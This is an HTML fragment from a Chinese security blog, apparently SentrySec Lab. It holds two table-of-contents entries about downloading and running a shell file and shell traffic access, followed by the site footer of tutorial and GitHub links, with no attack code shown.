<li class="toc-entry toc-h4"><a href="#下载shell文件执行">下载shell文件执行</a></li>
<li class="toc-entry toc-h4"><a href="#shell流量接入">shell流量接入</a></li>
</ul>
    </p>

</div>


    </div><!--/row -->
        
</div><!--/container -->


        <div id="footerwrap">
    <div class="container">
        <div class="row">
            <div class="col-sm-4">
                <div class="col-sm-6">
                  <p class="thuhidden"><strong>入门</strong></p>
                  <p class="thuhidden"><a href="https://github.com/tuna/mirror-web" target="blank"><em>Jekyll</em>源码</a></p>
                  <p class="thuhidden"><a href="https://www.sentrylab.cn/blog/2019/jekyll/in/linux" target="blank">博客搭建教程</a></p>
                  <p class="thuhidden"><a href="https://about.sentrylab.cn/news/sentry-lab-markdown-usage/" target="blank">个性化语法批注</a></p>
                  <p class="thuhidden"><a href="https://www.sentrylab.cn/blog/2019/nginx/with/jekyll-site/" target="blank">公网部署</a></p>
                  </div>

                  <div class="col-sm-6">
                  <p class="thuhidden"><strong>社区</strong></p>
                  <p class="thuhidden"><a href="/blog" target="blank">博客</a></p>
                  <p class="thuhidden"><a href="https://github.com/Bin4xin/bigger-than-bigger/tree/master/CoVV" target="blank"><em>Collection of verified vulnerabilities</em></a></p>
                  <p class="thuhidden"><a href="https://github.com/Bin4xin/bigger-than-bigger" target="blank"><em>Bigger than Bigger</em></a></p>
                  <p class="thuhidden"><a href="https://github.com/Bin4xin/B4xinSynchronize" target="blank"><em>B4xinSynchronize</em></a></p>
                  </div>
            </div>

        <div class="col-sm-4">
                  <div class="col-sm-6">
                    <p class="thuhidden"><strong>开发</strong></p>
                    <p class="thuhidden"><a href="https://github.com/Bin4xin/Bin4xin" target="blank"><em>Bin4xin</em></a></p>
                    <p class="thuhidden"><a href="https://www.cloudflare.com/waf/" target="blank"><em>CloudFlare WAF</em></a></p>
                    <p class="thuhidden"><a href="https://jekyllrb.com/docs/" target="blank"><em>Jekyll</em></a></p>
                    <p class="thuhidden"><a href="https://www.markdownguide.org/" target="blank"><em>MarkDown</em></a></p>
                    <p class="share">
                    <a href="https://github.com/Bin4xin/" target="blank"><i class="fa fa-github"></i></a>
                    <a href="https://twitter.com/Bin4xin"><i class="fa fa-twitter" target="blank"></i></a>
                    <a href="#"><i class="fa fa-facebook" target="blank"></i></a>
                    </p>
                  </div>

                  <div class="col-sm-6">
                    <p class="thuhidden"><strong>关于</strong></p>
                    <p class="thuhidden"><a href="https://about.sentrylab.cn/" target="blank">近期研究</a></p>
                    <p class="thuhidden">∑ <csmall>(Visitors/times)</csmall></em></p>
                    <img src="https://profile-counter.glitch.me/bin4xin.github.io/count.svg" style="max-width:100%;">
                  </div>
            </div>

        <div class="col-sm-4">
          
          <picture>
  <img src="/assets/img/logo-small@3x.jpg" srcset="/assets/img/logo-small@3x.png 1x" />
  </picture>

        </div>
        </div><!--/row -->
      <p class="thuhidden">© 2019-2021 SentrySec, Lab. Build by Jekyll under the terms of the MIT License.</p>
    </div><!--/container -->
</div><!--/footerwrap -->
    </body>
</html>